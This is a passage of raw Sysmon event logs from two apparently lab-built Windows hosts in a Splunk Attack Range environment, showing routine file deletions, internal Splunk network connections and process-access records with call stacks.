Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E869626891C5EEC302446D6CF746EF1D,SHA256=291BF44424A5E26D005302F2D06C40F5A1465E744CB11D3251A6BD76DA7EA6E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:33.560{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C6102F90C63F9D6A5D22B950677E147,SHA256=F0975E6356D2FE1089E9A9CF576F71901211A58E6BFE5DCC0AD8E68EAFBC7592,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:33.560{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=024222C9D71439FC1D2456A1C78DA6AF,SHA256=358C0AAB909EDB023F2487F7C24081E903E692E58E70D826BAD98D8F1304FB9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:34.943{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-158MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:34.925{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=171EF04B159C6130C344C7692BE7A375,SHA256=D2BCDBED28FB9CC3E26A25AE4B63816366EC4AE9A23C6D30276E0A8BBFAB7B84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:34.660{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=522DEB946F53EA8AF7FA59F05B4CDBF5,SHA256=73349AE95C7282EA38D67CB146826FBA4C3A19CDFF5A2E18B7D6E79B5792777B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:34.660{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E0C66419AE6FD0B065718680929BE786,SHA256=EF697828384722892E86D19E5584FD4F576A28EB31D7137188829065CA5A4E32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:34.576{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BCFAFD632B25ADB1F7265AAEA1F32ED,SHA256=87E77F459E988D251B1E3E497C9681C98087C59502F5611510622E2136E2A0E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:31.577{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51632-false10.0.1.12-8000- 23542300x8000000000000000221151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:35.960{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB4C6825021C7648D585E3799834AA88,SHA256=C22B9B3359B355980C68B55ABAFD7A43CF4D24CD85B8180278DEEC6DCCAF09A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:35.957{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-159MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:35.591{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0812E3AA9F9084BAD94D2CEC3ABB078E,SHA256=339597A1F34A31AD67CA57815FF6CA2E3DCCFB79C97F4EFEA1924659D8224F63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:36.610{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00AB580D18A7F5C852EDFBE214D3560E,SHA256=2B15A46507DB1FA589AB87FA4DBA5179AFD35AEEEA114C6D1D2B7D684737F874,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:37.627{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=525D9E564EC8963E76EB19DF9738EE80,SHA256=D8604F12D3D87B3F6E1BB7C3864894E7C4724B2482515A3F52590C3FCB8943FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:37.002{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=048D8D8E27C0DB7A379A0B0BB2F9ED6D,SHA256=F5484E294717B491D725E89F4D129CDB4C5FCF8FBB864556FF1107F286504B0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:38.629{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F0B58FB0B818DA9B21DFF68A761EAC7,SHA256=5AAC4F18EE98ACC9AF10DDE75FC10FCEF99A73F21A5DCFF66E80880A434BFD30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:38.065{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4298BEAC8CF9A1FB81F47C81E2789174,SHA256=E006FED16F23F5756D79C828E6AA6DDE644C0937D3F450FAFB7491734767E32F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:35.679{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49440-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:39.644{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FFE5629529D2A3383E73A4BA01BC068,SHA256=CAAFEA22D9ABCDE12A7172FA1AC7336A37A77E459B4F585AC54D7CB21676B36A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:39.080{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=354A290C78B96687BD3B14B768D3F65D,SHA256=0B00513AEC8C4AB5A83FBE274DCBD488064D60159F0F5CF517F7FE0D25E52EAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:40.660{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F029E12A1CAB234B53B0949E3D87E0B2,SHA256=23E2EB78EF6FBED5B8AECF894C1094A434BE90768303CA36699EF13DD72CF103,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:40.112{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=215572817173A2EE2EF1378C8A4EEA64,SHA256=D5AA7801965C53AA4ABE4AF84E2C6C7D084BE804164770D9B63E8C0F8EFE8E48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:40.429{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:37.500{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51633-false10.0.1.12-8000- 23542300x8000000000000000297313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:41.728{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A819EA19CBB3F4C54ED0100469319AA2,SHA256=D46BBB261906972AF517F9792B585EF25BF8BCEEFF801E35C745B704EBAA0322,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:41.127{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E606897D29C805BFAAC83130DA234811,SHA256=59099A62D8FBAC09D31ED85743F840E7DA1116BCB406012E33EE5D14006CC4E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:42.743{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE31BF5EC1D47372EBDC613CD466C79E,SHA256=7ADD0CC50F9343BB0BF79706E704A480C1B8DB13D271C6376F4A2D926DB1090C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:42.143{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=976E02A9969F3E44DCA09A4ADA8DAFA1,SHA256=5B358288D4F49CE2DF15BCB4EB3B2990830210469EC7000E9AA930A4D5D4D963,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:39.880{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49441-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000297317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:43.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81BAD44985B7E3D87A265D8B7309D2B1,SHA256=A28C664EEFF12910CA664661F56E3B362F5550DA3A29AEFB6931F57589B6B77F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:43.268{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=863B300EBDFE5AD83B50CD9CA7693C3C,SHA256=06FFE61C3731FD243C5AB06CEB169967ED69222BEAA1705F11DFB7B61D1E6D38,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:40.702{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49442-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:44.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F41AEE1B2B6ADB938B31C660AAF7A64E,SHA256=CCDF226F44AECF1BB531C0E82FA7946C4B5A8EF96E29CDE93AB0738A4386A4E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1760-6216-0905-000000003902}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:44.955{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 